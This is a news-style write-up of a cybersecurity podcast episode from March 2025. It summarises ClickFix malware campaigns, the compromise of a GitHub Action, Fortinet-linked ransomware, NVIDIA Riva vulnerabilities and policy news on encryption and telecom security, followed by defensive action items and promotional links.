In this episode of the CyberHub Podcast (Episode 880), recorded on Monday, March 17, 2025—coinciding with St. Patrick’s Day—host James Azar delves into a series of cybersecurity developments that highlight the rising threat of supply chain attacks, targeted espionage campaigns, and newly uncovered vulnerabilities in widely used products.
Below is a detailed, readable news-style summary of each story discussed.
One Hundred Car Dealership Websites Compromised
Over one hundred auto dealership websites were found hosting malicious “click-fix” code. Attackers managed to compromise a third-party service, Less Automotive, which specializes in hosting dealership video content. This type of supply chain attack tricked users with a fake CAPTCHA or prompt that copied malicious commands to their clipboard.
Once pasted into a Windows Run prompt, the code initiated a malware download. This technique, employed by both criminal gangs and advanced persistent threat groups (APTs), demonstrates how tools such as CAPTCHAs can be turned against unsuspecting users. Security professionals are reminded that heightened vigilance and monitoring are crucial to mitigating these increasingly sophisticated attacks.
Denmark’s Cybersecurity Agency Warns Telecom Sector
The Danish Cybersecurity Agency issued an alert about state-sponsored espionage campaigns targeting telecommunications infrastructure in Europe. The announcement appears linked to “Salt Typhoon,” a wide-ranging campaign by Chinese threat actors who have already impacted organizations in the United States, Asia, and Europe.
This revelation underscores the Chinese modus operandi of reusing proven exploits globally. Security teams in multinational organizations must acknowledge that geopolitical tension frequently spills over into cyberspace, making robust defense measures against espionage campaigns a high priority.
‘SuperBlack’ Ransomware Exploits Fortinet Flaws
Researchers at Forescout Vedere Labs discovered that attackers are exploiting two critical CVEs in Fortinet’s FortiOS firewalls (CVE-2024-55591 and CVE-2025-24472) to deploy a ransomware strain called “Super Black.” By chaining these vulnerabilities, attackers can escalate privileges to “super admin” level and then install ransomware.
The campaign, traced to a group known as “Mora001” with links to LockBit, rapidly followed the publication of proof-of-concept exploits. Thousands of exposed FortiGate firewalls remain at risk, making immediate patching an urgent matter.
NVIDIA’s AI Riva Vulnerabilities
NVIDIA released critical updates to address security flaws in its Riva AI services platform. Riva, which enables multilingual speech recognition and translation, was found to have two improper access control vulnerabilities (CVE-2025-23242 and CVE-2025-23243). Exploiting these flaws could allow attackers to escalate privileges, alter data, and even cause denial-of-service conditions. Administrators are urged to update Riva to version 2.19.0 or higher to eliminate the risk of unauthorized access and data tampering.
Popular GitHub Action “change-files” Compromised
A GitHub Action named “tj-actions/change-files,” used by more than 23,000 repositories, was compromised in another supply chain breach. Threat actors modified the code to insert a malicious Python script that attempted to steal Continuous Integration/Continuous Deployment (CI/CD) secrets.
While there is no direct evidence of widespread exploitation or data exfiltration, the incident is a stark reminder to carefully manage and monitor secrets and tokens in any CI/CD environment.
New Decrypter for Akira Ransomware
A security researcher, after weeks of effort and GPU-based brute forcing, released a working decrypter for the Linux variant of Akira ransomware. Leveraging the fact that Akira’s encryption key relies on timestamps, the decryptor uses GPU power to systematically crack each file’s unique encryption key.
Though it is not a simple turnkey tool—because it individually brute forces files—it offers vital relief for organizations hit by Akira without forcing them to pay a ransom.
Phishing Campaign Impersonating Booking.com
A phishing campaign designed to resemble legitimate messages from Booking.com has been targeting the hospitality industry across North America, Europe, and Southeast Asia. Using a “click-fix” malware execution trick, threat actors prompt victims to solve a CAPTCHA-like challenge, then copy malicious code into a Windows Run dialog, installing various malware strains such as Xworm, Luma Stealer, and NetSupport RAT.
Booking.com itself has not been breached; the scam relies on brand impersonation, which underscores the ongoing necessity for user training and robust email filtering.
Google and UK Government Encryption Orders
A bipartisan group of US lawmakers has raised concerns over a secret British court order that may force technology firms like Google to compromise encryption. Google has refused to confirm or deny receiving such an order, fueling speculation that the UK government is demanding a “backdoor” into encrypted communications.
Similar demands have been a point of contention with Apple in the UK. This situation highlights the tension between law enforcement, which seeks access to potentially vital data, and privacy advocates who warn against weakening encryption.
FCC’s Council on National Security
FCC Commissioner Brendan Carr announced a new Council on National Security, aimed at safeguarding US telecom networks from foreign state-sponsored threats, particularly from China. The council will coordinate regulatory enforcement, investigation, and oversight within the FCC across multiple bureaus.
It plans to mitigate vulnerabilities in 5G, satellite communications, quantum computing, and other emerging technologies. The move follows alarming reports of advanced intrusions, such as the Salt Typhoon incident, targeting sensitive political communications.
The council will have three main goals:
Reduce the dependence of U.S. telecom and technology sectors’ trade and supply chain dependence on foreign adversaries.
Mitigate vulnerabilities linked to cyberattacks, espionage and surveillance from foreign adversaries.
Help ensure the U.S. wins the strategic competition with China over critical technologies, including 5G, satellites, quantum computing, IoT and robotics.
Action Items
Patch and Update: Immediately apply security updates for Fortinet products and NVIDIA Riva to close known critical vulnerabilities.
Monitor Supply Chain Dependencies: Assess and audit third-party integrations (e.g., GitHub Actions, content-sharing platforms) to prevent compromise through vendor breaches.
Harden User Awareness: Train employees to identify and resist social engineering tactics like click-fix prompts and malicious CAPTCHA schemes.
Secure CI/CD Secrets: Implement robust secret management solutions, limiting privileges and monitoring logs for suspicious behavior.
Evaluate Ransomware Recovery: Familiarize your IT teams with available decrypters (e.g., for Akira) and test them in a safe environment.
Enable Multi-layered Telecom Security: For multinational organizations, prioritize protections against espionage and thoroughly review telecom infrastructure.
Stay Current on Encryption Laws: Track legislative and legal developments around encryption mandates in your operational regions.
Join the Conversation: Share insights within your networks, attend relevant events (such as CyberTech in Israel), and collaborate on security best practices.
✅ Story Links:
https://www.securityweek.com/100-car-dealerships-hit-by-supply-chain-attack/
https://therecord.media/europe-increased-cyber-espionage-telecoms-denmark-report
https://www.securityweek.com/nvidia-riva-vulnerabilities-allow-unauthorized-use-of-ai-services/
https://www.securityweek.com/popular-github-action-targeted-in-supply-chain-attack/
https://therecord.media/booking-phishing-hotels-malware-campaign
https://therecord.media/google-refuses-to-deny-it-received-uk-tcn
https://www.cybersecuritydive.com/news/fcc-national-security-council/742440/
Level Zero Conference Discount Code: L020RESPOND at www.levelzeroconference.com
🔔 Subscribe now for the latest insights from industry leaders, in-depth analyses, and real-world strategies to secure your digital world. https://www.youtube.com/@TheCyberHubPodcast/?sub_confirmation=1
🚨 Important Links to Follow:
👉Website:
👉Listen here: https://linktr.ee/cyberhubpodcast
✅ Stay Connected With Us.
👉Facebook: https://www.facebook.com/CyberHubpodcast/
👉LinkedIn: https://www.linkedin.com/company/cyberhubpodcast/
👉Twitter (X): https://twitter.com/cyberhubpodcast
👉Instagram: https://www.instagram.com/cyberhubpodcast
🤝 For Business Inquiries: info@cyberhubpodcast.com
=============================
🚀 About The CyberHub Podcast.
The Hub of the Infosec Community.
Our mission is to provide substantive and quality content that’s more than headlines or sales pitches. We want to be a valuable source to assist those cybersecurity practitioners in their mission to keep their organizations secure.
Tune in to our podcast Monday through Thursday at 9AM EST for the latest news.
Share this post